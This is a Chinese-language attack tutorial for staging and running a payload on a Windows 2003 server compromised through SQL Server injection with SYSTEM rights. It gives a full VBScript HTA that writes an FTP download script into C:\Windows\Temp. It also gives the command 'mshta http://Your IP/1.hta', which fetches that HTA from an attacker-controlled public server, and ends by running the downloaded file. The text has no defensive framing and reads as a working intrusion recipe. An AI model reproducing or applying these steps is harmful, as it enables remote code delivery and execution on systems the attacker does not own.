环境说明
系统:Windows 2003
版本:Microsoft Windows [版本 5.2.3790]
命令执行环境:SQL server注入点,SYSTEM权限
常规下载方法:
第一种:certutil下载
Certutil下载后无法找到文件,也无缓存文件。
第二种:FTP下载
通过OS-shell写入的FTP配置出现写入多次,echo的内容被echo了多个内容进去。重复性内容,导致无法加载配置类型文件。
成功方法:mshta 远程下载
准备工具:
- FTP server 迷你版(https://www.jb51.net/softs/58172.html)
- 公网Apache
- hta文件。
HTA文件内容:
<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Set obj = createobject("wscript.shell")
obj.run "cmd /k C: && echo open 你的FTP的IP地址>>C:\Windows\Temp\10.txt && echo admin>>C:\Windows\Temp\10.txt && echo 123456>>C:\Windows\Temp\10.txt && echo bin>>C:\Windows\Temp\10.txt && echo get 下载的文件名称>>C:\Windows\Temp\10.txt && echo bye>>C:\Windows\Temp\10.txt"
</script>
<body>
Test
</body>
</HEAD>
</HTML>
将其保存为 1.hta 文档,放到Apache中,让他在公网可以被访问。
然后搭建FTP服务,下载好的FTP server 迷你版打开,设置
设置的账户密码有一个特别重要的一点,
设置的用户名后面需要加上一个空格,
密码也是如此,需要加上一个空格,可以直接复制下方的:
admin
123456
(因为Echo进去的内容会在后面自动带一个空格,导致ftp去登陆验证发现账户密码错误。)
紧接着,直接到os-shell中执行命令。
mshta http://Your IP/1.hta
等待下载完毕,直到这里出现连接数为 0
然后os-shell直接运行 Your filename就OK了。
